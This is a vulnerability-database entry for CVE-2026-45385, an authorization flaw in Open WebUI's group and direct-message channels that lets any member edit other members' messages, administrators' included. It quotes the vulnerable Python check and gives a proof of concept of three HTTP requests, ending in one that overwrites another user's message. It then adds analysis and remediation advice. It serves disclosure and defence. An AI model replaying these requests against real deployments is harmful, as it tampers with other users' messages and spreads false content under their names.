Skip to main content

Open WebUI CVE-2026-45385

| EUVDEUVD-2026-30626 MEDIUM
Authorization Bypass Through User-Controlled Key (CWE-639)
2026-05-14 https://github.com/open-webui/open-webui GHSA-wwhq-cx22-f7vv
4.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.3 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 14, 2026 - 21:32 vuln.today
Analysis Generated
May 14, 2026 - 21:32 vuln.today
CVE Published
May 14, 2026 - 20:25 nvd
MEDIUM 4.3

DescriptionGitHub Advisory

Summary

An IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. This vulnerability affects the latest version (v0.8.12) of Open WebUI.

Details

In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. The problematic code is as follows (https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/channels.py#L1355) :

python
if channel.type in ['group', 'dm']:
    if not Channels.is_user_channel_member(channel.id, user.id, db=db):
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())
else:
    if (
        user.role != 'admin'
        and message.user_id != user.id
        and not channel_has_access(user.id, channel, permission='write', strict=False, db=db)
    ):
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())

try:
    message = Messages.update_message_by_id(message_id, form_data, db=db)

Non-group/dm types include a check for the user ID, while the group/dm type clearly lacks this verification.

PoC

The Channels feature is disabled by default and can be enabled first through the admin interface. <img width="1024" height="618" alt="image" src="https://github.com/user-attachments/assets/a36502e9-c6cd-41cd-a69c-8b6ac809768f" />

Create a group type channel with members including users test1 and test2.

POST /api/v1/channels/create HTTP/1.1
Content-Type: application/json

{
  "name": "idor-test-group",
  "type": "group",
  "user_ids": [
    "cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c",
    "b9997496-ff80-4c30-a366-95474f85e62b"
  ]
}

User test2 sends a message in the channel.

POST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/post HTTP/1.1
Content-Type: application/json
Authorization: Bearer <test2_token>

{"content":"This is test2 secret message"}

User test1 can directly modify the message that test2 just sent.

POST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/e0824c09-5712-4400-9b7a-b08eefcf15d3/update HTTP/1.1
Content-Type: application/json
Authorization: Bearer <test1_token>

{"content":"HACKED BY TEST1 - message tampered!"}

<img width="1024" height="216" alt="image" src="https://github.com/user-attachments/assets/77646d01-d501-4732-ac37-3ffb69f9f01f" />

Messages sent by administrators can also be modified.

<img width="1024" height="419" alt="image" src="https://github.com/user-attachments/assets/b32dc5eb-f810-41d3-b358-f000d8331761" />

Impact

Malicious users can arbitrarily tamper with messages published by other users (including administrators), allowing them to disseminate false information.

Suggested Fix

Add a message ownership check in the group/dm branch of channels.py.

AnalysisAI

Modify messages from any channel member in Open WebUI v0.8.12 through v0.9.4 via Insecure Direct Object Reference (IDOR) in the message update API endpoint. Any authenticated user with group or direct message channel membership can tamper with messages sent by other members, including administrators, by bypassing message ownership verification. Publicly available exploit code exists demonstrating the vulnerability; patch available in v0.9.5.

Technical ContextAI

Open WebUI's message update functionality in the update_message_by_id endpoint (channels.py line 1355) implements inconsistent authorization logic based on channel type. For 'group' and 'dm' type channels, the code only verifies channel membership via is_user_channel_member() without validating message ownership, while other channel types properly check message.user_id != user.id. This is a classic IDOR flaw (CWE-639: Authorization Through User-Controlled Key) where an attacker uses a predictable or guessable resource identifier (message_id) to access or modify another user's data. The vulnerability stems from incomplete authorization checks in the REST API endpoint handling POST requests to /api/v1/channels/{channel_id}/messages/{message_id}/update.

RemediationAI

Upgrade Open WebUI to version v0.9.5 or later immediately - this is the vendor-released patch that implements message ownership verification in the group/dm channel authorization logic. Organizations unable to upgrade immediately should disable the Channels feature via the admin interface (it is disabled by default, but verify your configuration) to eliminate attack surface. If Channels must remain enabled, implement network-level access controls restricting the /api/v1/channels/*/messages/*/update API endpoint to trusted administrators only, though this mitigates rather than eliminates the vulnerability. Temporary monitoring can detect exploitation attempts by alerting on message update API calls followed by content mismatches between the original sender and the request user. Refer to the vendor advisory at https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv for confirmation and deployment guidance.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-45385 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy